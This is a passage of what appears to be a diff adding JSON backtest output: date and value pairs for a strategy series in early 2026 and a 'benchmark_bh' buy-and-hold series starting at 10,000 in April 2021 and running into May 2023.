], + [ + "2026-01-05", + 17494.915607043655 + ], + [ + "2026-01-06", + 17496.967825617583 + ], + [ + "2026-01-07", + 17499.02028492437 + ], + [ + "2026-01-08", + 17501.072984992254 + ], + [ + "2026-01-09", + 17503.12592584948 + ], + [ + "2026-01-12", + 17505.179107524295 + ], + [ + "2026-01-13", + 17507.232530044945 + ], + [ + "2026-01-14", + 17509.286193439682 + ], + [ + "2026-01-15", + 17511.340097736764 + ], + [ + "2026-01-16", + 17513.394242964445 + ], + [ + "2026-01-20", + 17515.448629150993 + ], + [ + "2026-01-21", + 17517.503256324668 + ], + [ + "2026-01-22", + 17519.55812451374 + ], + [ + "2026-01-23", + 17521.613233746484 + ], + [ + "2026-01-26", + 17523.668584051175 + ], + [ + "2026-01-27", + 17525.72417545609 + ], + [ + "2026-01-28", + 17527.78000798951 + ], + [ + "2026-01-29", + 17529.83608167972 + ], + [ + "2026-01-30", + 17528.90239655501 + ], + [ + "2026-02-02", + 17693.137083155503 + ], + [ + "2026-02-03", + 17695.21255384474 + ], + [ + "2026-02-04", + 17697.288267994394 + ], + [ + "2026-02-05", + 17699.364225633028 + ], + [ + "2026-02-06", + 17698.450426789204 + ], + [ + "2026-02-09", + 17859.469823734773 + ], + [ + "2026-02-10", + 17861.56480587221 + ], + [ + "2026-02-11", + 17863.660033758835 + ], + [ + "2026-02-12", + 17865.75550742347 + ], + [ + "2026-02-13", + 17864.861226894947 + ], + [ + "2026-02-17", + 18007.469560180205 + ], + [ + "2026-02-18", + 18097.64124665356 + ], + [ + "2026-02-19", + 18099.764167183435 + ], + [ + "2026-02-20", + 18098.897336739774 + ], + [ + "2026-02-23", + 18163.867447547196 + ], + [ + "2026-02-24", + 18277.0744025219 + ], + [ + "2026-02-25", + 18279.218371227344 + ], + [ + "2026-02-26", + 18281.36259142828 + ], + [ + "2026-02-27", + 18280.517063154206 + ], + [ + "2026-03-02", + 18402.632791166496 + ], + [ + "2026-03-03", + 17920.343349787327 + ], + [ + "2026-03-04", + 18191.820464696877 + ], + [ + "2026-03-05", + 18115.029573339063 + ], + [ + "2026-03-06", + 17443.35885158783 + ], + [ + "2026-03-09", + 17748.776909462405 + ], + [ + "2026-03-10", + 17799.069132829194 + ], + [ + "2026-03-11", + 17833.883142225004 + ], + [ + "2026-03-12", + 17780.148379237402 + ], + [ + "2026-03-13", + 17847.32536963376 + ], + [ + "2026-03-16", + 17980.327374775097 + ], + [ + "2026-03-17", + 17982.436533952117 + ], + [ + "2026-03-18", + 17984.545940541342 + ], + [ + "2026-03-19", + 17986.655594571796 + ], + [ + "2026-03-20", + 17985.7754960725 + ], + [ + "2026-03-23", + 18105.121878561757 + ], + [ + "2026-03-24", + 18107.245676597537 + ], + [ + "2026-03-25", + 18109.369723762713 + ], + [ + "2026-03-26", + 18111.494020086513 + ], + [ + "2026-03-27", + 18110.62856559816 + ], + [ + "2026-03-30", + 17882.962662611644 + ], + [ + "2026-03-31", + 18224.028639078082 + ], + [ + "2026-04-01", + 18226.166385318473 + ], + [ + "2026-04-02", + 18228.304382324433 + ], + [ + "2026-04-06", + 18230.442630125384 + ], + [ + "2026-04-07", + 18232.581128750742 + ], + [ + "2026-04-08", + 18234.71987822993 + ], + [ + "2026-04-09", + 18236.85887859238 + ], + [ + "2026-04-10", + 18238.998129867512 + ], + [ + "2026-04-13", + 18241.137632084767 + ], + [ + "2026-04-14", + 18243.277385273577 + ], + [ + "2026-04-15", + 18245.417389463382 + ], + [ + "2026-04-16", + 18247.557644683628 + ], + [ + "2026-04-17", + 18249.69815096376 + ], + [ + "2026-04-20", + 18251.838908333226 + ], + [ + "2026-04-21", + 18253.97991682148 + ], + [ + "2026-04-22", + 18256.121176457986 + ], + [ + "2026-04-23", + 18258.262687272196 + ] + ], + "benchmark_bh": [ + [ + "2021-04-16", + 10000.0 + ], + [ + "2021-04-19", + 9737.141307983195 + ], + [ + "2021-04-20", + 9598.349984615556 + ], + [ + "2021-04-21", + 9850.116335754517 + ], + [ + "2021-04-22", + 9635.708660605775 + ], + [ + "2021-04-23", + 9811.399986595945 + ], + [ + "2021-04-26", + 9991.167569785533 + ], + [ + "2021-04-27", + 9916.226816894246 + ], + [ + "2021-04-28", + 9765.6686329904 + ], + [ + "2021-04-29", + 9829.061609330518 + ], + [ + "2021-04-30", + 9555.108417972959 + ], + [ + "2021-05-03", + 9455.713359579522 + ], + [ + "2021-05-04", + 9296.323824692665 + ], + [ + "2021-05-05", + 9354.509509270221 + ], + [ + "2021-05-06", + 9431.261212540281 + ], + [ + "2021-05-07", + 9560.767907714488 + ], + [ + "2021-05-10", + 9135.571220480188 + ], + [ + "2021-05-11", + 9147.798912846987 + ], + [ + "2021-05-12", + 8775.128960064443 + ], + [ + "2021-05-13", + 8886.976190966983 + ], + [ + "2021-05-14", + 9162.06095650341 + ], + [ + "2021-05-17", + 9082.139550454773 + ], + [ + "2021-05-18", + 9009.011906405163 + ], + [ + "2021-05-19", + 9184.701073932427 + ], + [ + "2021-05-20", + 9426.28055938293 + ], + [ + "2021-05-21", + 9374.20764175732 + ], + [ + "2021-05-24", + 9611.030954192776 + ], + [ + "2021-05-25", + 9639.556120737076 + ], + [ + "2021-05-26", + 9665.36594094467 + ], + [ + "2021-05-27", + 9706.117720624317 + ], + [ + "2021-05-28", + 9796.23354698159 + ], + [ + "2021-06-01", + 9768.838335768978 + ], + [ + "2021-06-02", + 9828.379535051981 + ], + [ + "2021-06-03", + 9659.479812597934 + ], + [ + "2021-06-04", + 9894.042135138556 + ], + [ + "2021-06-07", + 9817.061634800379 + ], + [ + "2021-06-08", + 9760.910301512446 + ], + [ + "2021-06-09", + 9712.914720317709 + ], + [ + "2021-06-10", + 9824.485667968183 + ], + [ + "2021-06-11", + 9874.127077129326 + ], + [ + "2021-06-14", + 10014.442275309138 + ], + [ + "2021-06-15", + 9932.385070214259 + ], + [ + "2021-06-16", + 9838.992697164524 + ], + [ + "2021-06-17", + 9945.077911337467 + ], + [ + "2021-06-18", + 9707.065285840386 + ], + [ + "2021-06-21", + 9742.882819315178 + ], + [ + "2021-06-22", + 9788.895852330055 + ], + [ + "2021-06-23", + 9829.695118193651 + ], + [ + "2021-06-24", + 9996.759067945499 + ], + [ + "2021-06-25", + 9969.558118394496 + ], + [ + "2021-06-28", + 10207.572902354485 + ], + [ + "2021-06-29", + 10287.591439233927 + ], + [ + "2021-06-30", + 10296.20262700045 + ], + [ + "2021-07-01", + 10148.636072685375 + ], + [ + "2021-07-02", + 10210.518124990758 + ], + [ + "2021-07-06", + 10193.06479392669 + ], + [ + "2021-07-07", + 10038.695843760957 + ], + [ + "2021-07-08", + 9909.713655073094 + ], + [ + "2021-07-09", + 10071.33719906845 + ], + [ + "2021-07-12", + 10200.54494713007 + ], + [ + "2021-07-13", + 10159.739205877753 + ], + [ + "2021-07-14", + 10112.823935367851 + ], + [ + "2021-07-15", + 9888.40854695191 + ], + [ + "2021-07-16", + 9673.515217649147 + ], + [ + "2021-07-19", + 9663.770836856575 + ], + [ + "2021-07-20", + 9795.469451112596 + ], + [ + "2021-07-21", + 10096.2706833359 + ], + [ + "2021-07-22", + 10036.653937851162 + ], + [ + "2021-07-23", + 10087.88397571168 + ], + [ + "2021-07-26", + 10091.05691618462 + ], + [ + "2021-07-27", + 9905.862957247433 + ], + [ + "2021-07-28", + 10067.710981385093 + ], + [ + "2021-07-29", + 10273.08225157468 + ], + [ + "2021-07-30", + 10357.178124884995 + ], + [ + "2021-08-02", + 10422.689632568097 + ], + [ + "2021-08-03", + 10502.02825363191 + ], + [ + "2021-08-04", + 10609.018942994238 + ], + [ + "2021-08-05", + 10610.833131067371 + ], + [ + "2021-08-06", + 10558.015543738931 + ], + [ + "2021-08-09", + 10522.200168727046 + ], + [ + "2021-08-10", + 10400.0236135842 + ], + [ + "2021-08-11", + 10364.43379794607 + ], + [ + "2021-08-12", + 10253.133737390395 + ], + [ + "2021-08-13", + 10317.510972815995 + ], + [ + "2021-08-16", + 10279.203652378254 + ], + [ + "2021-08-17", + 10080.179342365996 + ], + [ + "2021-08-18", + 9946.891020179146 + ], + [ + "2021-08-19", + 10028.494948063606 + ], + [ + "2021-08-20", + 10103.75407423364 + ], + [ + "2021-08-23", + 10388.231930724565 + ], + [ + "2021-08-24", + 10388.231930724565 + ], + [ + "2021-08-25", + 10467.346071646076 + ], + [ + "2021-08-26", + 10477.092610901555 + ], + [ + "2021-08-27", + 10677.02347533465 + ], + [ + "2021-08-30", + 10698.331821150196 + ], + [ + "2021-08-31", + 10612.872878514261 + ], + [ + "2021-09-01", + 10555.070321102656 + ], + [ + "2021-09-02", + 10594.508676103538 + ], + [ + "2021-09-03", + 10673.84945563026 + ], + [ + "2021-09-07", + 10634.634501540226 + ], + [ + "2021-09-08", + 10498.397719022738 + ], + [ + "2021-09-09", + 10535.350603986486 + ], + [ + "2021-09-10", + 10618.993200086381 + ], + [ + "2021-09-13", + 10720.774439223243 + ], + [ + "2021-09-14", + 10721.228795665116 + ], + [ + "2021-09-15", + 10782.882050902383 + ], + [ + "2021-09-16", + 10803.510480902298 + ], + [ + "2021-09-17", + 10631.233843230622 + ], + [ + "2021-09-20", + 10368.06001562943 + ], + [ + "2021-09-21", + 10398.661623490034 + ], + [ + "2021-09-22", + 10614.460427982183 + ], + [ + "2021-09-23", + 10755.908819188044 + ], + [ + "2021-09-24", + 10743.573203675905 + ], + [ + "2021-09-27", + 10717.436376337937 + ], + [ + "2021-09-28", + 10298.192729800483 + ], + [ + "2021-09-29", + 10135.719830651316 + ], + [ + "2021-09-30", + 10131.630622674458 + ], + [ + "2021-10-01", + 10138.221489160253 + ], + [ + "2021-10-04", + 9877.133815958445 + ], + [ + "2021-10-05", + 10026.648383046871 + ], + [ + "2021-10-06", + 10065.732750131046 + ], + [ + "2021-10-07", + 10183.441287056896 + ], + [ + "2021-10-08", + 10079.140042476392 + ], + [ + "2021-10-11", + 10011.650303539242 + ], + [ + "2021-10-12", + 9886.675301237781 + ], + [ + "2021-10-13", + 9943.707287391673 + ], + [ + "2021-10-14", + 10252.291936856758 + ], + [ + "2021-10-15", + 10320.688230214746 + ], + [ + "2021-10-18", + 10403.855964475155 + ], + [ + "2021-10-19", + 10531.331546054098 + ], + [ + "2021-10-20", + 10509.519199149825 + ], + [ + "2021-10-21", + 10615.407993198252 + ], + [ + "2021-10-22", + 10496.338545409688 + ], + [ + "2021-10-25", + 10568.372927997023 + ], + [ + "2021-10-26", + 10576.32470534553 + ], + [ + "2021-10-27", + 10500.429911849455 + ], + [ + "2021-10-28", + 10737.206817332413 + ], + [ + "2021-10-29", + 10785.151674648843 + ], + [ + "2021-11-01", + 10961.0307869119 + ], + [ + "2021-11-02", + 11097.370096417459 + ], + [ + "2021-11-03", + 11225.30111366973 + ], + [ + "2021-11-04", + 11602.963051539886 + ], + [ + "2021-11-05", + 11731.804940138809 + ], + [ + "2021-11-08", + 11890.41311145342 + ], + [ + "2021-11-09", + 11890.41311145342 + ], + [ + "2021-11-10", + 11539.790238416259 + ], + [ + "2021-11-11", + 11783.840084663549 + ], + [ + "2021-11-12", + 11899.04912154337 + ], + [ + "2021-11-15", + 11890.186472848209 + ], + [ + "2021-11-16", + 12068.338446552087 + ], + [ + "2021-11-17", + 11984.261999407934 + ], + [ + "2021-11-18", + 12184.681755689411 + ], + [ + "2021-11-19", + 12218.539404844863 + ], + [ + "2021-11-22", + 12041.52494109285 + ], + [ + "2021-11-23", + 11993.122489640187 + ], + [ + "2021-11-24", + 12124.91715549556 + ], + [ + "2021-11-26", + 11787.476015429987 + ], + [ + "2021-11-29", + 12240.5794695858 + ], + [ + "2021-11-30", + 12026.0735843748 + ], + [ + "2021-12-01", + 11929.950755748014 + ], + [ + "2021-12-02", + 11947.221696696462 + ], + [ + "2021-12-03", + 11917.0010575389 + ], + [ + "2021-12-06", + 11901.774180963155 + ], + [ + "2021-12-07", + 12502.3502962976 + ], + [ + "2021-12-08", + 12421.00214626759 + ], + [ + "2021-12-09", + 12135.36951212155 + ], + [ + "2021-12-10", + 12249.895395491381 + ], + [ + "2021-12-13", + 11923.581131710162 + ], + [ + "2021-12-14", + 11866.227534583162 + ], + [ + "2021-12-15", + 12301.856073045838 + ], + [ + "2021-12-16", + 11765.17369744588 + ], + [ + "2021-12-17", + 11737.405072150399 + ], + [ + "2021-12-20", + 11645.455631553836 + ], + [ + "2021-12-21", + 12065.607990975035 + ], + [ + "2021-12-22", + 12191.015765089302 + ], + [ + "2021-12-23", + 12308.916405213853 + ], + [ + "2021-12-27", + 12646.217245190486 + ], + [ + "2021-12-28", + 12506.698519823269 + ], + [ + "2021-12-29", + 12525.818184251359 + ], + [ + "2021-12-30", + 12384.0989059507 + ], + [ + "2021-12-31", + 12346.757497663733 + ], + [ + "2022-01-03", + 12592.181205551178 + ], + [ + "2022-01-04", + 12553.477807170048 + ], + [ + "2022-01-05", + 12127.05942993052 + ], + [ + "2022-01-06", + 12221.313029680052 + ], + [ + "2022-01-07", + 11866.839458817229 + ], + [ + "2022-01-10", + 11871.16286001947 + ], + [ + "2022-01-11", + 12094.504413139297 + ], + [ + "2022-01-12", + 12183.294943271818 + ], + [ + "2022-01-13", + 11898.939039935125 + ], + [ + "2022-01-14", + 12183.748220482237 + ], + [ + "2022-01-18", + 11639.17450449516 + ], + [ + "2022-01-19", + 11296.762424355318 + ], + [ + "2022-01-20", + 10942.517650560612 + ], + [ + "2022-01-21", + 10760.38331279376 + ], + [ + "2022-01-24", + 10883.323963805598 + ], + [ + "2022-01-25", + 10477.168157103291 + ], + [ + "2022-01-26", + 10638.12905298627 + ], + [ + "2022-01-27", + 10164.582796640525 + ], + [ + "2022-01-28", + 10359.46609556616 + ], + [ + "2022-01-31", + 10915.87898059682 + ], + [ + "2022-02-01", + 11006.720050490765 + ], + [ + "2022-02-02", + 11284.69553747507 + ], + [ + "2022-02-03", + 10793.622562326425 + ], + [ + "2022-02-04", + 10855.545625427038 + ], + [ + "2022-02-07", + 10849.402639994396 + ], + [ + "2022-02-08", + 11123.735720823544 + ], + [ + "2022-02-09", + 11488.687549867238 + ], + [ + "2022-02-10", + 11130.568335154896 + ], + [ + "2022-02-11", + 10564.136944542504 + ], + [ + "2022-02-14", + 10574.152212429875 + ], + [ + "2022-02-15", + 11157.660282329107 + ], + [ + "2022-02-16", + 11161.302688484266 + ], + [ + "2022-02-17", + 10742.171282017964 + ], + [ + "2022-02-18", + 10622.188804419842 + ], + [ + "2022-02-22", + 10557.532048047817 + ], + [ + "2022-02-23", + 10305.964275496277 + ], + [ + "2022-02-24", + 10682.977595262952 + ], + [ + "2022-02-25", + 10861.013011969864 + ], + [ + "2022-02-28", + 10794.989948577859 + ], + [ + "2022-03-01", + 10403.631484332851 + ], + [ + "2022-03-02", + 10734.432113265773 + ], + [ + "2022-03-03", + 10509.267738221188 + ], + [ + "2022-03-04", + 10230.378142195867 + ], + [ + "2022-03-07", + 9717.220853816696 + ], + [ + "2022-03-08", + 9903.449795717674 + ], + [ + "2022-03-09", + 10318.484439586944 + ], + [ + "2022-03-10", + 10106.757575368398 + ], + [ + "2022-03-11", + 9889.792121675144 + ], + [ + "2022-03-14", + 9569.69207260249 + ], + [ + "2022-03-15", + 10009.54256451079 + ], + [ + "2022-03-16", + 10524.979189719501 + ], + [ + "2022-03-17", + 10589.862584696735 + ], + [ + "2022-03-18", + 10796.58289420305 + ], + [ + "2022-03-21", + 10775.182813713967 + ], + [ + "2022-03-22", + 10834.830856910854 + ], + [ + "2022-03-23", + 10561.858686944419 + ], + [ + "2022-03-24", + 11095.034639552343 + ], + [ + "2022-03-25", + 11069.9435874927 + ], + [ + "2022-03-28", + 11155.934591235151 + ], + [ + "2022-03-29", + 11411.631503327324 + ], + [ + "2022-03-30", + 11046.677515820724 + ], + [ + "2022-03-31", + 10795.313718013873 + ], + [ + "2022-04-01", + 10586.155424654373 + ], + [ + "2022-04-04", + 10758.134194444916 + ], + [ + "2022-04-05", + 10262.941792838716 + ], + [ + "2022-04-06", + 10007.699237188417 + ], + [ + "2022-04-07", + 10029.599001840414 + ], + [ + "2022-04-08", + 9780.746575625579 + ], + [ + "2022-04-11", + 9579.793679006132 + ], + [ + "2022-04-12", + 9550.598309729283 + ], + [ + "2022-04-13", + 9756.112038470716 + ], + [ + "2022-04-14", + 9486.275035876351 + ], + [ + "2022-04-18", + 9650.503844600167 + ], + [ + "2022-04-19", + 9861.949029409381 + ], + [ + "2022-04-20", + 9840.051423220291 + ], + [ + "2022-04-21", + 9577.514342176592 + ], + [ + "2022-04-22", + 9364.472974047829 + ], + [ + "2022-04-25", + 9522.769247472414 + ], + [ + "2022-04-26", + 9100.565269058337 + ], + [ + "2022-04-27", + 9050.839140228105 + ], + [ + "2022-04-28", + 9549.686359151176 + ], + [ + "2022-04-29", + 9141.623550470744 + ], + [ + "2022-05-02", + 9446.812937783494 + ], + [ + "2022-05-03", + 9525.048584301952 + ], + [ + "2022-05-04", + 9894.565562393445 + ], + [ + "2022-05-05", + 9415.337152445652 + ], + [ + "2022-05-06", + 9331.397767696077 + ], + [ + "2022-05-09", + 8856.274754196942 + ], + [ + "2022-05-10", + 9057.683086489717 + ], + [ + "2022-05-11", + 8790.126499956345 + ], + [ + "2022-05-12", + 8843.501510330458 + ], + [ + "2022-05-13", + 9294.90139763711 + ], + [ + "2022-05-16", + 9153.483224911943 + ], + [ + "2022-05-17", + 9598.040245188435 + ], + [ + "2022-05-18", + 9114.252082350109 + ], + [ + "2022-05-19", + 9059.05047274115 + ], + [ + "2022-05-20", + 9054.260843551046 + ], + [ + "2022-05-23", + 9093.267505970578 + ], + [ + "2022-05-24", + 8871.784389413473 + ], + [ + "2022-05-25", + 9031.450747168125 + ], + [ + "2022-05-26", + 9384.315723549684 + ], + [ + "2022-05-27", + 9770.254287435813 + ], + [ + "2022-05-31", + 9720.072183316528 + ], + [ + "2022-06-01", + 9565.881306340603 + ], + [ + "2022-06-02", + 9899.127473746885 + ], + [ + "2022-06-03", + 9603.059750678109 + ], + [ + "2022-06-06", + 9619.70905430941 + ], + [ + "2022-06-07", + 9696.580552270794 + ], + [ + "2022-06-08", + 9490.151635256894 + ], + [ + "2022-06-09", + 9220.77762295603 + ], + [ + "2022-06-10", + 8893.190405675548 + ], + [ + "2022-06-13", + 8380.112980423928 + ], + [ + "2022-06-14", + 8426.715273812351 + ], + [ + "2022-06-15", + 8571.546516008833 + ], + [ + "2022-06-16", + 8055.042530892731 + ], + [ + "2022-06-17", + 8087.709787755105 + ], + [ + "2022-06-21", + 8299.474425074519 + ], + [ + "2022-06-22", + 8212.895779805702 + ], + [ + "2022-06-23", + 8157.15671293296 + ], + [ + "2022-06-24", + 8518.549236643405 + ], + [ + "2022-06-27", + 8495.246471102013 + ], + [ + "2022-06-28", + 8288.052378987666 + ], + [ + "2022-06-29", + 8092.5075111811075 + ], + [ + "2022-06-30", + 7986.510254371616 + ], + [ + "2022-07-01", + 7703.9302263914615 + ], + [ + "2022-07-05", + 7764.69473452687 + ], + [ + "2022-07-06", + 7802.6156901043005 + ], + [ + "2022-07-07", + 8151.901395370723 + ], + [ + "2022-07-08", + 8190.736459989167 + ], + [ + "2022-07-11", + 8002.044711911574 + ], + [ + "2022-07-12", + 8024.4306703333195 + ], + [ + "2022-07-13", + 8069.662879391676 + ], + [ + "2022-07-14", + 8240.76423401062 + ], + [ + "2022-07-15", + 8437.452007926307 + ], + [ + "2022-07-18", + 8410.496043915224 + ], + [ + "2022-07-19", + 8781.255757025285 + ], + [ + "2022-07-20", + 9005.126133557267 + ], + [ + "2022-07-21", + 9152.243187972008 + ], + [ + "2022-07-22", + 8926.771771578937 + ], + [ + "2022-07-25", + 8870.346313501845 + ], + [ + "2022-07-26", + 8722.545565961385 + ], + [ + "2022-07-27", + 9121.63078779687 + ], + [ + "2022-07-28", + 9234.026268277728 + ], + [ + "2022-07-29", + 9305.072074853766 + ], + [ + "2022-08-01", + 9340.936015281053 + ], + [ + "2022-08-02", + 9323.116824754288 + ], + [ + "2022-08-03", + 9582.170146666474 + ], + [ + "2022-08-04", + 9651.384497466126 + ], + [ + "2022-08-05", + 9576.228977515615 + ], + [ + "2022-08-08", + 9431.397195703406 + ], + [ + "2022-08-09", + 8999.190900179401 + ], + [ + "2022-08-10", + 9372.688083870962 + ], + [ + "2022-08-11", + 9360.582344658393 + ], + [ + "2022-08-12", + 9634.480495211828 + ], + [ + "2022-08-15", + 9670.345514870569 + ], + [ + "2022-08-16", + 9571.429635242434 + ], + [ + "2022-08-17", + 9340.249624076703 + ], + [ + "2022-08-18", + 9553.156088273794 + ], + [ + "2022-08-19", + 9295.244593239284 + ], + [ + "2022-08-22", + 8945.505071146714 + ], + [ + "2022-08-23", + 8990.04765130636 + ], + [ + "2022-08-24", + 9012.665104874855 + ], + [ + "2022-08-25", + 9342.993030431197 + ], + [ + "2022-08-26", + 8813.009444462372 + ], + [ + "2022-08-29", + 8635.05389088301 + ], + [ + "2022-08-30", + 8534.539669472417 + ], + [ + "2022-08-31", + 8445.219776312013 + ], + [ + "2022-09-01", + 8288.509973123899 + ], + [ + "2022-09-02", + 8197.590658949586 + ], + [ + "2022-09-06", + 8103.013829379766 + ], + [ + "2022-09-07", + 8240.07946165345 + ], + [ + "2022-09-08", + 8378.971693161979 + ], + [ + "2022-09-09", + 8579.999596367437 + ], + [ + "2022-09-12", + 8621.803087098404 + ], + [ + "2022-09-13", + 8086.338624193585 + ], + [ + "2022-09-14", + 8178.173126640364 + ], + [ + "2022-09-15", + 8042.477578696748 + ], + [ + "2022-09-16", + 8090.679293099081 + ], + [ + "2022-09-19", + 8133.169175034398 + ], + [ + "2022-09-20", + 8025.1154426904895 + ], + [ + "2022-09-21", + 7944.020372436299 + ], + [ + "2022-09-22", + 7727.9156058271155 + ], + [ + "2022-09-23", + 7624.432958304001 + ], + [ + "2022-09-26", + 7510.0970196699645 + ], + [ + "2022-09-27", + 7579.920057009323 + ], + [ + "2022-09-28", + 7687.410430534566 + ], + [ + "2022-09-29", + 7448.313717042564 + ], + [ + "2022-09-30", + 7320.610957242685 + ], + [ + "2022-10-03", + 7573.719332693925 + ], + [ + "2022-10-04", + 7929.034164474658 + ], + [ + "2022-10-05", + 7993.804779765014 + ], + [ + "2022-10-06", + 7961.880573758293 + ], + [ + "2022-10-07", + 7484.143661679071 + ], + [ + "2022-10-10", + 7229.6576472775905 + ], + [ + "2022-10-11", + 7026.3897991906415 + ], + [ + "2022-10-12", + 6958.174277101094 + ], + [ + "2022-10-13", + 7158.4569709879925 + ], + [ + "2022-10-14", + 6860.101816853775 + ], + [ + "2022-10-17", + 7005.488863248748 + ], + [ + "2022-10-18", + 7029.604829690262 + ], + [ + "2022-10-19", + 7074.622271689395 + ], + [ + "2022-10-20", + 7118.491411422133 + ], + [ + "2022-10-21", + 7383.083888768794 + ], + [ + "2022-10-24", + 7415.009713622696 + ], + [ + "2022-10-25", + 7584.2839293910665 + ], + [ + "2022-10-26", + 7509.637806686551 + ], + [ + "2022-10-27", + 7376.42287223853 + ], + [ + "2022-10-28", + 7665.591608241572 + ], + [ + "2022-10-31", + 7498.612378158816 + ], + [ + "2022-11-01", + 7559.019660683156 + ], + [ + "2022-11-02", + 7320.381620558841 + ], + [ + "2022-11-03", + 7222.307001848616 + ], + [ + "2022-11-04", + 7556.493179850792 + ], + [ + "2022-11-07", + 7719.795468371881 + ], + [ + "2022-11-08", + 7889.759313038961 + ], + [ + "2022-11-09", + 7637.569903170275 + ], + [ + "2022-11-10", + 8427.900809563891 + ], + [ + "2022-11-11", + 8685.831191148834 + ], + [ + "2022-11-14", + 8590.744424717293 + ], + [ + "2022-11-15", + 8839.718804086358 + ], + [ + "2022-11-16", + 8474.756182728132 + ], + [ + "2022-11-17", + 8541.134313268298 + ], + [ + "2022-11-18", + 8560.197318045084 + ], + [ + "2022-11-21", + 8418.25409921785 + ], + [ + "2022-11-22", + 8669.066409752022 + ], + [ + "2022-11-23", + 8773.799886529605 + ], + [ + "2022-11-25", + 8656.892678957889 + ], + [ + "2022-11-28", + 8440.533753341435 + ], + [ + "2022-11-29", + 8407.918299588824 + ], + [ + "2022-11-30", + 8912.298738173376 + ], + [ + "2022-12-01", + 8848.216672550278 + ], + [ + "2022-12-02", + 8748.305201906398 + ], + [ + "2022-12-05", + 8637.599797881534 + ], + [ + "2022-12-06", + 8455.922514635187 + ], + [ + "2022-12-07", + 8437.777935825228 + ], + [ + "2022-12-08", + 8681.698813913841 + ], + [ + "2022-12-09", + 8601.310640261614 + ], + [ + "2022-12-12", + 8753.58911910215 + ], + [ + "2022-12-13", + 8904.035062934843 + ], + [ + "2022-12-14", + 8770.447254019678 + ], + [ + "2022-12-15", + 8399.398846495838 + ], + [ + "2022-12-16", + 8335.828876197367 + ], + [ + "2022-12-19", + 8232.645175786838 + ], + [ + "2022-12-20", + 8182.434472034037 + ], + [ + "2022-12-21", + 8366.692737301142 + ], + [ + "2022-12-22", + 8028.57977565584 + ], + [ + "2022-12-23", + 8035.489015420383 + ], + [ + "2022-12-27", + 7890.385267281922 + ], + [ + "2022-12-28", + 7774.073795472473 + ], + [ + "2022-12-29", + 8022.130828106166 + ], + [ + "2022-12-30", + 8014.759677279577 + ], + [ + "2023-01-03", + 7936.6794400904055 + ], + [ + "2023-01-04", + 8140.976874983879 + ], + [ + "2023-01-05", + 8003.704569886874 + ], + [ + "2023-01-06", + 8376.136012518222 + ], + [ + "2023-01-09", + 8530.449921879832 + ], + [ + "2023-01-10", + 8640.775976048832 + ], + [ + "2023-01-11", + 8752.252490947138 + ], + [ + "2023-01-12", + 8858.66039532464 + ], + [ + "2023-01-13", + 8895.2819562322 + ], + [ + "2023-01-17", + 8905.41647919517 + ], + [ + "2023-01-18", + 8858.66039532464 + ], + [ + "2023-01-19", + 8610.14307047608 + ], + [ + "2023-01-20", + 8879.619609765015 + ], + [ + "2023-01-23", + 9325.525669358234 + ], + [ + "2023-01-24", + 9255.045380063768 + ], + [ + "2023-01-25", + 9280.15262059521 + ], + [ + "2023-01-26", + 9436.539733578766 + ], + [ + "2023-01-27", + 9376.426541625471 + ], + [ + "2023-01-30", + 9127.444607636231 + ], + [ + "2023-01-31", + 9297.654517074683 + ], + [ + "2023-02-01", + 9782.484138265521 + ], + [ + "2023-02-02", + 10009.121664243972 + ], + [ + "2023-02-03", + 9813.807751968438 + ], + [ + "2023-02-06", + 9654.426850933207 + ], + [ + "2023-02-07", + 9961.447694022341 + ], + [ + "2023-02-08", + 9747.246152081196 + ], + [ + "2023-02-09", + 9772.12027861871 + ], + [ + "2023-02-10", + 9616.651591601982 + ], + [ + "2023-02-13", + 9758.070843558602 + ], + [ + "2023-02-14", + 9935.18891353014 + ], + [ + "2023-02-15", + 9975.725926150566 + ], + [ + "2023-02-16", + 9731.122434167692 + ], + [ + "2023-02-17", + 9579.571357326735 + ], + [ + "2023-02-21", + 9269.324691423444 + ], + [ + "2023-02-22", + 9224.875464784516 + ], + [ + "2023-02-23", + 9528.207494765997 + ], + [ + "2023-02-24", + 9357.537832728407 + ], + [ + "2023-02-27", + 9407.05836796677 + ], + [ + "2023-02-28", + 9439.304724562326 + ], + [ + "2023-03-01", + 9441.838760014864 + ], + [ + "2023-03-02", + 9517.38280328859 + ], + [ + "2023-03-03", + 9664.098923218402 + ], + [ + "2023-03-06", + 9551.700205043184 + ], + [ + "2023-03-07", + 9451.05107970092 + ], + [ + "2023-03-08", + 9702.33177668586 + ], + [ + "2023-03-09", + 9509.554058325768 + ], + [ + "2023-03-10", + 9325.756624889258 + ], + [ + "2023-03-13", + 9328.517298947005 + ], + [ + "2023-03-14", + 9601.221819513 + ], + [ + "2023-03-15", + 9489.28501239983 + ], + [ + "2023-03-16", + 9859.87366732453 + ], + [ + "2023-03-17", + 9798.837732478596 + ], + [ + "2023-03-20", + 9902.482804335445 + ], + [ + "2023-03-21", + 9922.06114213122 + ], + [ + "2023-03-22", + 9823.48198271654 + ], + [ + "2023-03-23", + 10091.14325470089 + ], + [ + "2023-03-24", + 9916.119972980361 + ], + [ + "2023-03-27", + 9799.744286899437 + ], + [ + "2023-03-28", + 9726.317695737242 + ], + [ + "2023-03-29", + 10038.960255467036 + ], + [ + "2023-03-30", + 10204.285563347486 + ], + [ + "2023-03-31", + 10267.554428070465 + ], + [ + "2023-04-03", + 10178.888009555083 + ], + [ + "2023-04-04", + 9989.085732311964 + ], + [ + "2023-04-05", + 9815.90901560817 + ], + [ + "2023-04-06", + 9765.340546628573 + ], + [ + "2023-04-10", + 9937.824396739297 + ], + [ + "2023-04-11", + 9885.641397505442 + ], + [ + "2023-04-12", + 9704.843148277876 + ], + [ + "2023-04-13", + 9784.735415077274 + ], + [ + "2023-04-14", + 9769.497746186995 + ], + [ + "2023-04-17", + 9769.497746186995 + ], + [ + "2023-04-18", + 9811.751816049748 + ], + [ + "2023-04-19", + 9704.383395678735 + ], + [ + "2023-04-20", + 9695.377209200275 + ], + [ + "2023-04-21", + 9624.259094116862 + ], + [ + "2023-04-24", + 9581.082281361469 + ], + [ + "2023-04-25", + 9259.201500390736 + ], + [ + "2023-04-26", + 9308.615191715215 + ], + [ + "2023-04-27", + 9347.86899813757 + ], + [ + "2023-04-28", + 9516.428762683803 + ], + [ + "2023-05-01", + 9602.552511895019 + ], + [ + "2023-05-02", + 9533.975986884316 + ], + [ + "2023-05-03", + 9424.528966734093 + ], + [ + "2023-05-04", + 9371.652021675716 + ], + [ + "2023-05-05", + 9580.155221543015 + ], + [ + "2023-05-08", + 9620.563805620486 + ], + [ + "2023-05-09", + 9456.854107225747 + ], + [ + "2023-05-10", + 9553.1420582649 + ], + [ + "2023-05-11", + 9490.568218597899 + ], + [ + "2023-05-12", + 9481.791908419009 + ], 